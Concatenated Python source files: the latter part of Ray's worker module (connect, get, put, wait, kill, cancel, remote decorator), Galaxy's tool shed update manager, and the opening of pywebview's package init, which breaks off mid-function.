assert worker.cached_functions_to_run is not None, error_message
# Enable nice stack traces on SIGSEGV etc.
try:
if not faulthandler.is_enabled():
faulthandler.enable(all_threads=False)
except io.UnsupportedOperation:
pass # ignore
# Create a Redis client to primary.
# The Redis client can safely be shared between threads. However,
# that is not true of Redis pubsub clients. See the documentation at
# https://github.com/andymccurdy/redis-py#thread-safety.
worker.redis_client = node.create_redis_client()
ray.state.state._initialize_global_state(
node.redis_address, redis_password=node.redis_password)
# Initialize some fields.
if mode in (WORKER_MODE, RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
# We should not specify the job_id if it's `WORKER_MODE`.
assert job_id is None
job_id = JobID.nil()
else:
# This is the code path of driver mode.
if job_id is None:
job_id = ray.state.next_job_id()
if mode is not SCRIPT_MODE and mode is not LOCAL_MODE and setproctitle:
process_name = ray_constants.WORKER_PROCESS_TYPE_IDLE_WORKER
if mode is SPILL_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_SPILL_WORKER_IDLE)
elif mode is RESTORE_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_RESTORE_WORKER_IDLE)
setproctitle.setproctitle(process_name)
if not isinstance(job_id, JobID):
raise TypeError("The type of given job id must be JobID.")
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.node = node
worker.set_mode(mode)
# For driver's check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray._private.services.check_version_info(worker.redis_client)
except Exception as e:
if mode == SCRIPT_MODE:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray._private.utils.push_error_to_driver_through_redis(
worker.redis_client,
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
job_id=None)
worker.lock = threading.RLock()
driver_name = ""
log_stdout_file_path = ""
log_stderr_file_path = ""
interactive_mode = False
if mode == SCRIPT_MODE:
import __main__ as main
if hasattr(main, "__file__"):
driver_name = main.__file__
else:
interactive_mode = True
driver_name = "INTERACTIVE MODE"
elif not LOCAL_MODE:
raise ValueError(
"Invalid worker mode. Expected DRIVER, WORKER or LOCAL.")
redis_address, redis_port = node.redis_address.split(":")
gcs_options = ray._raylet.GcsClientOptions(
redis_address,
int(redis_port),
node.redis_password,
)
if job_config is None:
job_config = ray.job_config.JobConfig()
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
# The namespace field of job config may have already been set in code
# paths such as the client.
job_config.set_ray_namespace(namespace)
# Make sure breakpoint() in the user's code will
# invoke the Ray debugger if we are in a worker or actor process
# (but not on the driver).
if mode == WORKER_MODE:
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb.set_trace"
else:
# Add hook to suppress worker logs during breakpoint.
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb._driver_set_trace"
worker.ray_debugger_external = ray_debugger_external
serialized_job_config = job_config.serialize()
worker.core_worker = ray._raylet.CoreWorker(
mode, node.plasma_store_socket_name, node.raylet_socket_name, job_id,
gcs_options, node.get_logs_dir_path(), node.node_ip_address,
node.node_manager_port, node.raylet_ip_address, (mode == LOCAL_MODE),
driver_name, log_stdout_file_path, log_stderr_file_path,
serialized_job_config, node.metrics_agent_port, runtime_env_hash,
worker_shim_pid)
worker.gcs_client = worker.core_worker.get_gcs_client()
# If it's a driver and it's not coming from ray client, we'll prepare the
# environment here. If it's ray client, the environment will be prepared
# at the server side.
if mode == SCRIPT_MODE and not job_config.client_job:
manager = working_dir_pkg.WorkingDirManager(
worker.node.get_runtime_env_dir_path())
manager.upload_runtime_env_package_if_needed(job_config)
# Notify raylet that the core worker is ready.
worker.core_worker.notify_raylet()
if driver_object_store_memory is not None:
logger.warning("`driver_object_store_memory` is deprecated"
" and will be removed in the future.")
# Start the import thread
if mode not in (RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
worker.import_thread = import_thread.ImportThread(
worker, mode, worker.threads_stopped)
worker.import_thread.start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
worker.listener_thread = threading.Thread(
target=listen_error_messages_raylet,
name="ray_listen_error_messages",
args=(worker, worker.threads_stopped))
worker.listener_thread.daemon = True
worker.listener_thread.start()
if log_to_driver:
global_worker_stdstream_dispatcher.add_handler(
"ray_print_logs", print_to_stdstream)
worker.logger_thread = threading.Thread(
target=worker.print_logs, name="ray_print_logs")
worker.logger_thread.daemon = True
worker.logger_thread.start()
if mode == SCRIPT_MODE:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
# are the same.
# When using an interactive shell, there is no script directory.
if not interactive_mode:
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
# In client mode, if we use runtime envs with "working_dir", then
# it'll be handled automatically. Otherwise, add the current dir.
if not job_config.client_job and len(
job_config.get_runtime_env_uris()) == 0:
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
worker.cached_functions_to_run = None
# Setup tracing here
if _internal_kv_get("tracing_startup_hook"):
ray.util.tracing.tracing_helper._global_is_tracing_enabled = True
if not getattr(ray, "__traced__", False):
_setup_tracing = import_from_string(
_internal_kv_get("tracing_startup_hook").decode("utf-8"))
_setup_tracing()
ray.__traced__ = True
def disconnect(exiting_interpreter=False):
"""Disconnect this worker from the raylet and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker = global_worker
if worker.connected:
# Shutdown all of the threads that we've started. TODO(rkn): This
# should be handled cleanly in the worker object's destructor and not
# in this disconnect method.
worker.threads_stopped.set()
if hasattr(worker, "import_thread"):
worker.import_thread.join_import_thread()
if hasattr(worker, "listener_thread"):
worker.listener_thread.join()
if hasattr(worker, "logger_thread"):
worker.logger_thread.join()
worker.threads_stopped.clear()
worker._session_index += 1
global_worker_stdstream_dispatcher.remove_handler("ray_print_logs")
worker.node = None # Disconnect the worker from the node.
worker.cached_functions_to_run = []
worker.serialization_context_map.clear()
try:
ray_actor = ray.actor
except AttributeError:
ray_actor = None # This can occur during program termination
if ray_actor is not None:
ray_actor.ActorClassMethodMetadata.reset_cache()
@contextmanager
def _changeproctitle(title, next_title):
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(title)
try:
yield
finally:
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(next_title)
@DeveloperAPI
def show_in_dashboard(message: str, key: str = "", dtype: str = "text"):
"""Display message in dashboard.
Display message for the current task or actor in the dashboard.
For example, this can be used to display the status of a long-running
computation.
Args:
message (str): Message to be displayed.
key (str): The key name for the message. Multiple message under
different keys will be displayed at the same time. Messages
under the same key will be overridden.
data_type (str): The type of message for rendering. One of the
following: text, html.
"""
worker = global_worker
worker.check_connected()
acceptable_dtypes = {"text", "html"}
assert dtype in acceptable_dtypes, (
f"dtype accepts only: {acceptable_dtypes}")
message_wrapped = {"message": message, "dtype": dtype}
message_encoded = json.dumps(message_wrapped).encode()
worker.core_worker.set_webui_display(key.encode(), message_encoded)
# Global variable to make sure we only send out the warning once.
blocking_get_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def get(object_refs: Union[ray.ObjectRef, List[ray.ObjectRef]],
*,
timeout: Optional[float] = None) -> Union[Any, List[Any]]:
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ref is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_refs is a list, then the objects
corresponding to each object in the list will be returned.
Ordering for an input list of object refs is preserved for each object
returned. That is, if an object ref to A precedes an object ref to B in the
input list, then A will precede B in the returned list.
This method will issue a warning if it's running inside async context,
you can use ``await object_ref`` instead of ``ray.get(object_ref)``. For
a list of object refs, you can use ``await asyncio.gather(*object_refs)``.
Args:
object_refs: Object ref of the object to get or a list of object refs
to get.
timeout (Optional[float]): The maximum amount of time in seconds to
wait before returning.
Returns:
A Python object or a list of Python objects.
Raises:
GetTimeoutError: A GetTimeoutError is raised if a timeout is set and
the get takes longer than timeout to return.
Exception: An exception is raised if the task that created the object
or that created one of the objects raised an exception.
"""
worker = global_worker
worker.check_connected()
if hasattr(
worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio():
global blocking_get_inside_async_warned
if not blocking_get_inside_async_warned:
logger.warning("Using blocking ray.get inside async actor. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.gather if you want to "
"yield execution to the event loop instead.")
blocking_get_inside_async_warned = True
with profiling.profile("ray.get"):
is_individual_id = isinstance(object_refs, ray.ObjectRef)
if is_individual_id:
object_refs = [object_refs]
if not isinstance(object_refs, list):
raise ValueError("'object_refs' must either be an object ref "
"or a list of object refs.")
# TODO(ujvl): Consider how to allow user to retrieve the ready objects.
values, debugger_breakpoint = worker.get_objects(
object_refs, timeout=timeout)
for i, value in enumerate(values):
if isinstance(value, RayError):
if isinstance(value, ray.exceptions.ObjectLostError):
worker.core_worker.dump_object_store_memory_usage()
if isinstance(value, RayTaskError):
raise value.as_instanceof_cause()
else:
raise value
if is_individual_id:
values = values[0]
if debugger_breakpoint != b"":
frame = sys._getframe().f_back
rdb = ray.util.pdb.connect_ray_pdb(
host=None,
port=None,
patch_stdstreams=False,
quiet=None,
breakpoint_uuid=debugger_breakpoint.decode()
if debugger_breakpoint else None,
debugger_external=worker.ray_debugger_external)
rdb.set_trace(frame=frame)
return values
@PublicAPI
@client_mode_hook(auto_init=True)
def put(value: Any, *,
_owner: Optional["ray.actor.ActorHandle"] = None) -> ray.ObjectRef:
"""Store an object in the object store.
The object may not be evicted while a reference to the returned ID exists.
Args:
value: The Python object to be stored.
_owner: The actor that should own this object. This allows creating
objects with lifetimes decoupled from that of the creating process.
Note that the owner actor must be passed a reference to the object
prior to the object creator exiting, otherwise the reference will
still be lost.
Returns:
The object ref assigned to this value.
"""
worker = global_worker
worker.check_connected()
if _owner is None:
serialize_owner_address = None
elif isinstance(_owner, ray.actor.ActorHandle):
# Ensure `ray.state.state.global_state_accessor` is not None
ray.state.state._check_connected()
owner_address = gcs_utils.ActorTableData.FromString(
ray.state.state.global_state_accessor.get_actor_info(
_owner._actor_id)).address
if len(owner_address.worker_id) == 0:
raise RuntimeError(
f"{_owner} is not alive, it's worker_id is empty!")
serialize_owner_address = owner_address.SerializeToString()
else:
raise TypeError(
f"Expect an `ray.actor.ActorHandle`, but got: {type(_owner)}")
with profiling.profile("ray.put"):
try:
object_ref = worker.put_object(
value, owner_address=serialize_owner_address)
except ObjectStoreFullError:
logger.info(
"Put failed since the value was either too large or the "
"store was full of pinned objects.")
raise
return object_ref
# Global variable to make sure we only send out the warning once.
blocking_wait_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def wait(object_refs: List[ray.ObjectRef],
*,
num_returns: int = 1,
timeout: Optional[float] = None,
fetch_local: bool = True
) -> Tuple[List[ray.ObjectRef], List[ray.ObjectRef]]:
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object refs.
This method returns two lists. The first list consists of object refs that
correspond to objects that are available in the object store. The second
list corresponds to the rest of the object refs (which may or may not be
ready).
Ordering of the input list of object refs is preserved. That is, if A
precedes B in the input list, and both are in the ready list, then A will
precede B in the ready list. This also holds true if A and B are both in
the remaining list.
This method will issue a warning if it's running inside an async context.
Instead of ``ray.wait(object_refs)``, you can use
``await asyncio.wait(object_refs)``.
Args:
object_refs (List[ObjectRef]): List of object refs for objects that may
or may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object refs that should be returned.
timeout (float): The maximum amount of time in seconds to wait before
returning.
fetch_local (bool): If True, wait for the object to be downloaded onto
the local node before returning it as ready. If False, ray.wait()
will not trigger fetching of objects to the local node and will
return immediately once the object is available anywhere in the
cluster.
Returns:
A list of object refs that are ready and a list of the remaining object
IDs.
"""
worker = global_worker
worker.check_connected()
if hasattr(worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio(
) and timeout != 0:
global blocking_wait_inside_async_warned
if not blocking_wait_inside_async_warned:
logger.debug("Using blocking ray.wait inside async method. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.wait. ")
blocking_wait_inside_async_warned = True
if isinstance(object_refs, ObjectRef):
raise TypeError(
"wait() expected a list of ray.ObjectRef, got a single "
"ray.ObjectRef")
if not isinstance(object_refs, list):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got {type(object_refs)}")
if timeout is not None and timeout < 0:
raise ValueError("The 'timeout' argument must be nonnegative. "
f"Received {timeout}")
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got list containing {type(object_ref)}")
worker.check_connected()
# TODO(swang): Check main thread.
with profiling.profile("ray.wait"):
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
# fixed in Arrow instead of here.
if len(object_refs) == 0:
return [], []
if len(object_refs) != len(set(object_refs)):
raise ValueError("Wait requires a list of unique object refs.")
if num_returns <= 0:
raise ValueError(
"Invalid number of objects to return %d." % num_returns)
if num_returns > len(object_refs):
raise ValueError("num_returns cannot be greater than the number "
"of objects provided to ray.wait.")
timeout = timeout if timeout is not None else 10**6
timeout_milliseconds = int(timeout * 1000)
ready_ids, remaining_ids = worker.core_worker.wait(
object_refs,
num_returns,
timeout_milliseconds,
worker.current_task_id,
fetch_local,
)
return ready_ids, remaining_ids
@PublicAPI
@client_mode_hook(auto_init=True)
def get_actor(name: str,
namespace: Optional[str] = None) -> "ray.actor.ActorHandle":
"""Get a handle to a named actor.
Gets a handle to an actor with the given name. The actor must
have been created with Actor.options(name="name").remote(). This
works for both detached & non-detached actors.
Args:
name: The name of the actor.
namespace: The namespace of the actor, or None to specify the current
namespace.
Returns:
ActorHandle to the actor.
Raises:
ValueError if the named actor does not exist.
"""
if not name:
raise ValueError("Please supply a non-empty value to get_actor")
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
worker = global_worker
worker.check_connected()
return worker.core_worker.get_named_actor_handle(name, namespace or "")
@PublicAPI
@client_mode_hook(auto_init=True)
def kill(actor: "ray.actor.ActorHandle", *, no_restart: bool = True):
"""Kill an actor forcefully.
This will interrupt any running tasks on the actor, causing them to fail
immediately. ``atexit`` handlers installed in the actor will not be run.
If you want to kill the actor but let pending tasks finish,
you can call ``actor.__ray_terminate__.remote()`` instead to queue a
termination task. Any ``atexit`` handlers installed in the actor *will*
be run in this case.
If the actor is a detached actor, subsequent calls to get its handle via
ray.get_actor will fail.
Args:
actor (ActorHandle): Handle to the actor to kill.
no_restart (bool): Whether or not this actor should be restarted if
it's a restartable actor.
"""
worker = global_worker
worker.check_connected()
if not isinstance(actor, ray.actor.ActorHandle):
raise ValueError("ray.kill() only supported for actors. "
"Got: {}.".format(type(actor)))
worker.core_worker.kill_actor(actor._ray_actor_id, no_restart)
@PublicAPI
@client_mode_hook(auto_init=True)
def cancel(object_ref: ray.ObjectRef,
*,
force: bool = False,
recursive: bool = True):
"""Cancels a task according to the following conditions.
If the specified task is pending execution, it will not be executed. If
the task is currently executing, the behavior depends on the ``force``
flag. When ``force=False``, a KeyboardInterrupt will be raised in Python
and when ``force=True``, the executing task will immediately exit.
If the task is already finished, nothing will happen.
Only non-actor tasks can be canceled. Canceled tasks will not be
retried (max_retries will not be respected).
Calling ray.get on a canceled task will raise a TaskCancelledError or a
WorkerCrashedError if ``force=True``.
Args:
object_ref (ObjectRef): ObjectRef returned by the task
that should be canceled.
force (boolean): Whether to force-kill a running task by killing
the worker that is running the task.
recursive (boolean): Whether to try to cancel tasks submitted by the
task specified.
Raises:
TypeError: This is also raised for actor tasks.
"""
worker = ray.worker.global_worker
worker.check_connected()
if not isinstance(object_ref, ray.ObjectRef):
raise TypeError(
"ray.cancel() only supported for non-actor object refs. "
f"Got: {type(object_ref)}.")
return worker.core_worker.cancel_task(object_ref, force, recursive)
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to
serialize remote functions, we don't attempt to serialize the worker
object, which cannot be serialized.
"""
return worker.mode
def make_decorator(num_returns=None,
num_cpus=None,
num_gpus=None,
memory=None,
object_store_memory=None,
resources=None,
accelerator_type=None,
max_calls=None,
max_retries=None,
max_restarts=None,
max_task_retries=None,
runtime_env=None,
worker=None,
retry_exceptions=None):
def decorator(function_or_class):
if (inspect.isfunction(function_or_class)
or is_cython(function_or_class)):
# Set the remote function default resources.
if max_restarts is not None:
raise ValueError("The keyword 'max_restarts' is not "
"allowed for remote functions.")
if max_task_retries is not None:
raise ValueError("The keyword 'max_task_retries' is not "
"allowed for remote functions.")
if num_returns is not None and (not isinstance(num_returns, int)
or num_returns < 0):
raise ValueError(
"The keyword 'num_returns' only accepts 0 or a"
" positive integer")
if max_retries is not None and (not isinstance(max_retries, int)
or max_retries < -1):
raise ValueError(
"The keyword 'max_retries' only accepts 0, -1 or a"
" positive integer")
if max_calls is not None and (not isinstance(max_calls, int)
or max_calls < 0):
raise ValueError(
"The keyword 'max_calls' only accepts 0 or a positive"
" integer")
return ray.remote_function.RemoteFunction(
Language.PYTHON, function_or_class, None, num_cpus, num_gpus,
memory, object_store_memory, resources, accelerator_type,
num_returns, max_calls, max_retries, retry_exceptions,
runtime_env)
if inspect.isclass(function_or_class):
if num_returns is not None:
raise TypeError("The keyword 'num_returns' is not "
"allowed for actors.")
if max_retries is not None:
raise TypeError("The keyword 'max_retries' is not "
"allowed for actors.")
if retry_exceptions is not None:
raise TypeError("The keyword 'retry_exceptions' is not "
"allowed for actors.")
if max_calls is not None:
raise TypeError("The keyword 'max_calls' is not "
"allowed for actors.")
if max_restarts is not None and (not isinstance(max_restarts, int)
or max_restarts < -1):
raise ValueError(
"The keyword 'max_restarts' only accepts -1, 0 or a"
" positive integer")
if max_task_retries is not None and (not isinstance(
max_task_retries, int) or max_task_retries < -1):
raise ValueError(
"The keyword 'max_task_retries' only accepts -1, 0 or a"
" positive integer")
return ray.actor.make_actor(function_or_class, num_cpus, num_gpus,
memory, object_store_memory, resources,
accelerator_type, max_restarts,
max_task_retries, runtime_env)
raise TypeError("The @ray.remote decorator must be applied to "
"either a function or to a class.")
return decorator
@PublicAPI
def remote(*args, **kwargs):
"""Defines a remote function or an actor class.
This can be used with no arguments to define a remote function or actor as
follows:
.. code-block:: python
@ray.remote
def f():
return 1
@ray.remote
class Foo:
def method(self):
return 1
It can also be used with specific keyword arguments as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Remote task and actor objects returned by @ray.remote can also be
dynamically modified with the same arguments as above using
``.options()`` as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
g = f.options(num_gpus=2, max_calls=None)
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Bar = Foo.options(num_cpus=1, resources=None)
Running remote actors will be terminated when the actor handle to them
in Python is deleted, which will cause them to complete any outstanding
work and then shut down. If you want to kill them immediately, you can
also call ``ray.kill(actor)``.
Args:
num_returns (int): This is only for *remote functions*. It specifies
the number of object refs returned by
the remote function invocation.
num_cpus (float): The quantity of CPU cores to reserve
for this task or for the lifetime of the actor.
num_gpus (int): The quantity of GPUs to reserve
for this task or for the lifetime of the actor.
resources (Dict[str, float]): The quantity of various custom resources
to reserve for this task or for the lifetime of the actor.
This is a dictionary mapping strings (resource names) to floats.
accelerator_type: If specified, requires that the task or actor run
on a node with the specified type of accelerator.
See `ray.accelerators` for accelerator types.
max_calls (int): Only for *remote functions*. This specifies the
maximum number of times that a given worker can execute
the given remote function before it must exit
(this can be used to address memory leaks in third-party
libraries or to reclaim resources that cannot easily be
released, e.g., GPU memory that was acquired by TensorFlow).
By default this is infinite.
max_restarts (int): Only for *actors*. This specifies the maximum
number of times that the actor should be restarted when it dies
unexpectedly. The minimum valid value is 0 (default),
which indicates that the actor doesn't need to be restarted.
A value of -1 indicates that an actor should be restarted
indefinitely.
max_task_retries (int): Only for *actors*. How many times to
retry an actor task if the task fails due to a system error,
e.g., the actor has died. If set to -1, the system will
retry the failed task until the task succeeds, or the actor
has reached its max_restarts limit. If set to `n > 0`, the
system will retry the failed task up to n times, after which the
task will throw a `RayActorError` exception upon :obj:`ray.get`.
Note that Python exceptions are not considered system errors
and will not trigger retries.
max_retries (int): Only for *remote functions*. This specifies
the maximum number of times that the remote function
should be rerun when the worker process executing it
crashes unexpectedly. The minimum valid value is 0,
the default is 4 (default), and a value of -1 indicates
infinite retries.
runtime_env (Dict[str, Any]): Specifies the runtime environment for
this actor or task and its children. See
:ref:`runtime-environments` for detailed documentation. This API is
in beta and may change before becoming stable.
retry_exceptions (bool): Only for *remote functions*. This specifies
whether application-level errors should be retried
up to max_retries times.
"""
worker = global_worker
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_decorator(worker=worker)(args[0])
# Parse the keyword arguments from the decorator.
valid_kwargs = [
"num_returns", "num_cpus", "num_gpus", "memory", "object_store_memory",
"resources", "accelerator_type", "max_calls", "max_restarts",
"max_task_retries", "max_retries", "runtime_env", "retry_exceptions"
]
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
f"the arguments in the list {valid_kwargs}, for example "
"'@ray.remote(num_returns=2, "
"resources={\"CustomResource\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in valid_kwargs, error_string
num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
resources = kwargs.get("resources")
if not isinstance(resources, dict) and resources is not None:
raise TypeError("The 'resources' keyword argument must be a "
f"dictionary, but received type {type(resources)}.")
if resources is not None:
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
accelerator_type = kwargs.get("accelerator_type")
# Handle other arguments.
num_returns = kwargs.get("num_returns")
max_calls = kwargs.get("max_calls")
max_restarts = kwargs.get("max_restarts")
max_task_retries = kwargs.get("max_task_retries")
memory = kwargs.get("memory")
object_store_memory = kwargs.get("object_store_memory")
max_retries = kwargs.get("max_retries")
runtime_env = kwargs.get("runtime_env")
retry_exceptions = kwargs.get("retry_exceptions")
return make_decorator(
num_returns=num_returns,
num_cpus=num_cpus,
num_gpus=num_gpus,
memory=memory,
object_store_memory=object_store_memory,
resources=resources,
accelerator_type=accelerator_type,
max_calls=max_calls,
max_restarts=max_restarts,
max_task_retries=max_task_retries,
max_retries=max_retries,
runtime_env=runtime_env,
worker=worker,
retry_exceptions=retry_exceptions)
|
update_manager.py
|
"""
Determine if installed tool shed repositories have updates available in their respective tool sheds.
"""
import logging
import threading
from galaxy.util import string_as_bool
import tool_shed.util.shed_util_common as suc
from tool_shed.util import common_util
from galaxy.model.orm import and_
log = logging.getLogger( __name__ )
class UpdateManager( object ):
def __init__( self, app ):
self.app = app
self.sa_session = self.app.model.context.current
# Ideally only one Galaxy server process should be able to check for repository updates.
self.running = True
self.sleeper = Sleeper()
self.restarter = threading.Thread( target=self.__restarter )
self.restarter.start()
self.seconds_to_sleep = int( app.config.hours_between_check * 3600 )
def __restarter( self ):
log.info( 'Update manager restarter starting up...' )
while self.running:
flush_needed = False
for repository in self.sa_session.query( self.app.model.ToolShedRepository ) \
.filter( and_( self.app.model.ToolShedRepository.table.c.update_available == False,
self.app.model.ToolShedRepository.table.c.deleted == False ) ):
if self.check_for_update( repository ):
repository.update_available = True
self.sa_session.add( repository )
flush_needed = True
if flush_needed:
self.sa_session.flush()
self.sleeper.sleep( self.seconds_to_sleep )
log.info( 'Transfer job restarter shutting down...' )
def check_for_update( self, repository ):
tool_shed_url = suc.get_url_from_tool_shed( self.app, repository.tool_shed )
url = '%s/repository/check_for_updates?name=%s&owner=%s&changeset_revision=%s&from_update_manager=True' % \
( tool_shed_url, repository.name, repository.owner, repository.changeset_revision )
try:
text = common_util.tool_shed_get( self.app, tool_shed_url, url )
except Exception, e:
# The required tool shed may be unavailable.
text = 'False'
return string_as_bool( text )
def shutdown( self ):
self.running = False
self.sleeper.wake()
class Sleeper( object ):
"""Provides a 'sleep' method that sleeps for a number of seconds *unless* the notify method is called (from a different thread)."""
def __init__( self ):
self.condition = threading.Condition()
def sleep( self, seconds ):
self.condition.acquire()
self.condition.wait( seconds )
self.condition.release()
def wake( self ):
self.condition.acquire()
self.condition.notify()
self.condition.release()
|
__init__.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
pywebview is a lightweight cross-platform wrapper around a webview component that allows to display HTML content in its
own dedicated window. Works on Windows, OS X and Linux and compatible with Python 2 and 3.
(C) 2014-2019 Roman Sirokov and contributors
Licensed under BSD license
http://github.com/r0x0r/pywebview/
"""
import logging
import sys
import os
import re
import threading
from uuid import uuid4
from proxy_tools import module_property
from webview.event import Event
from webview.guilib import initialize
from webview.util import _token, base_uri, parse_file_type, escape_string, make_unicode, escape_line_breaks, WebViewException
from webview.window import Window
from .localization import localization as original_localization
from .wsgi import Routing, StaticFiles, StaticResources
__all__ = (
# Stuff that's here
'start', 'create_window', 'token', 'screens'
# From wsgi
'Routing', 'StaticFiles', 'StaticResources',
# From event
'Event',
# from util
'_token', 'base_uri', 'parse_file_type', 'escape_string', 'make_unicode',
'escape_line_breaks', 'WebViewException',
# from window
'Window',
)
logger = logging.getLogger('pywebview')
handler = logging.StreamHandler()
formatter = logging.Formatter('[pywebview] %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
log_level = logging.DEBUG if os.environ.get('PYWEBVIEW_LOG') == 'debug' else logging.INFO
logger.setLevel(log_level)
OPEN_DIALOG = 10
FOLDER_DIALOG = 20
SAVE_DIALOG = 30
DRAG_REGION_SELECTOR = '.pywebview-drag-region'
guilib = None
_debug = {
'mode': False
}
_user_agent = None
_multiprocessing = False
_http_server = False
token = _token
windows = []
def start(func=None, args=None, localization={}, gui=None, debug=False, http_server=False, user_agent=None):
"""
Start a GUI loop and display previously created windows. This function must
be called from a main thread.
:param func: Function to invoke upon starting the GUI loop.
:param args: Function arguments. Can be either a single value or a tuple of
values.
:param localization: A dictionary with localized strings. Default strings
and their keys are defined in localization.py.
:param gui: Force a specific GUI. Allowed values are ``cef``, ``qt``, or
``gtk`` depending on a platform.
:param debug: Enable debug mode. Default is False.
:param http_server: Enable built-in HTTP server. If enabled, local files
will be served using a local HTTP server on a random port. For each
window, a separate HTTP server is spawned. This option is ignored for
non-local URLs.
:param user_agent: Change user agent string. Not supported in EdgeHTML.
"""
global guilib, _debug, _multiprocessing, _http_server, _user_agent
def _create_children(other_windows):
if not windows[0].shown.wait(10):
raise WebViewException('Main window failed to load')
for window in other_windows:
guilib.create_window(window)
_debug['mode'] = debug
_user_agent = user_agent
#_multiprocessing = multiprocessing
multiprocessing = False # TODO
_http_server = http_server
if multiprocessing:
from multiprocessing import Process as Thread
else:
from threading import Thread
original_localization.update(localization)
if threading.current_thread().name != 'MainThread':
raise WebViewException('This function must be run from a main thread.')
if len(windows) == 0:
raise WebViewException('You must create a window first before calling this function.')
guilib = initialize(gui)
for window in windows:
window._initialize(guilib, multiprocessing, http_server)
if len(windows) > 1:
t = Thread(target=_create_children, args=(windows[1:],))
t.start()
if func:
if args is not None:
if not hasattr(args, '__iter__'):
args = (args,)
t = Thread(target=func, args=args)
else:
t = Thread(target=func)
t.start()
guilib.create_window(windows[0])
def create_window(title, url=None, html=None, js_api=None, width=800, height=600, x=None, y=None,
resizable=True, fullscreen=False, min_size=(200, 100), hidden=False,
frameless=False, easy_drag=True,
minimized=False, on_top=False, confirm_close=False, background_color='#FFFFFF',
transparent=False, text_select=False):
"""
Create a web view window using a native GUI. The execution blocks after this function is invoked, so other
program logic must be executed in a separate thread.
:param title: Window title
:param url: URL to load
:param width: window width. Default is 800px
:param height:window height. Default is 600px
:param resizable True if window can be resized, False otherwise. Default is True
:param fullscreen: True if start in fullscreen mode. Default is False
:param min_size: a (width, height) tuple that specifies a minimum window size. Default is 200x100
:param hidden: Whether the window should be hidden.
:param frameless: Whether the window should have a frame.
:param easy_drag: Easy window drag mode when window is frameless.
:param minimized: Display window minimized
:param on_top: Keep window above other windows (required OS: Windows)
:param confirm_close: Display a window close confirmation dialog. Default is False
:param background_color: Background color as a hex string that is displayed before the content of webview is loaded. Default is white.
:param text_select: Allow text selection on page. Default is False.
:param transparent: Don't draw window background.
:return: window object.
"""
valid_color = r'^#(?:[0-9a-fA-F]{3}){1,2}$'
if not re.match(valid_color, background_color):
raise ValueError('{0} is not a valid hex triplet color'.format(background_color))
uid = 'master' if len(windows) == 0 else 'child_' + uuid4().hex[:8]
